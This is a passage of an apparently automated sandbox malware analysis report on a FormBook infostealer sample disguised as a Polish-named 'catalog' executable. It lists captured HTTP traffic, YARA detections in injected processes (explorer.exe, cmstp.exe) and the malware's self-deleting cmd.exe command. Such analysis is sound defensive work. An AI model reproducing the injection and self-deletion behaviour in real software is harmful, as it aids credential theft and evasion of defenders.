                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:50:03.508599043 CET  7576                IN         HTTP/1.1 404 Not Found
                                                Date: Thu, 04 Nov 2021 10:50:03 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 2963
                                                Connection: close
                                                x-wix-request-id: 1636023003.449130355506120675
                                                Age: 0
                                                Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjVnh5Kklh0tOjeXRNYui2I,qquldgcFrj2n046g4RNSVOc9uRR3b9ESRFQmutE6otVYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalt5/ToY82z3f1Iadd1mDV+wfoIgWdv1pdEYpwcIu9suB3fKEXQvQlSAkB/lstal9R17zYLyYyrK+fg616qIKE8c=,2UNV7KOq4oGjA5+PKsX47IJCkNcL1UXXT2AxlbYijuBYgeUJqUXtid+86vZww+nL,2+8df7/86SpxIBpm+VHpf+i/fkkIKkD/fZgnosx7etd9pAiCxHhredE3m8SaSeMp,l7Ey5khejq81S7sxGe5NkxC4MYanLpg+PuBnb2R7HRGTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9y9YchCOVZDNGbMpBN9NeuuXxLvkVaG5VQb5mydxWWiYfoPtReGns7o6BqA+77AHvGQ2Otd3B2C27oTTIAKJtQ==
                                                Vary: Accept-Encoding
                                                X-Content-Type-Options: nosniff
                                                Server: Pepyaka/1.19.10
                                                Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robo


                                                Code Manipulations

                                                Statistics

                                                Behavior

                                                System Behavior

                                                General

                                                Start time:11:47:59
                                                Start date:04/11/2021
                                                Path:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
                                                Imagebase:0x400000
                                                File size:422298 bytes
                                                MD5 hash:CBE0E49106FAD96B2C1C155CE5B22ABD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:11:48:01
                                                Start date:04/11/2021
                                                Path:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
                                                Imagebase:0x400000
                                                File size:422298 bytes
                                                MD5 hash:CBE0E49106FAD96B2C1C155CE5B22ABD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:11:48:05
                                                Start date:04/11/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6f22f0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Start time:11:48:30
                                                Start date:04/11/2021
                                                Path:C:\Windows\SysWOW64\cmstp.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                Imagebase:0xd0000
                                                File size:82944 bytes
                                                MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                General

                                                Start time:11:48:35
                                                Start date:04/11/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
                                                Imagebase:0x2a0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:11:48:36
                                                Start date:04/11/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff61de10000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Code Analysis
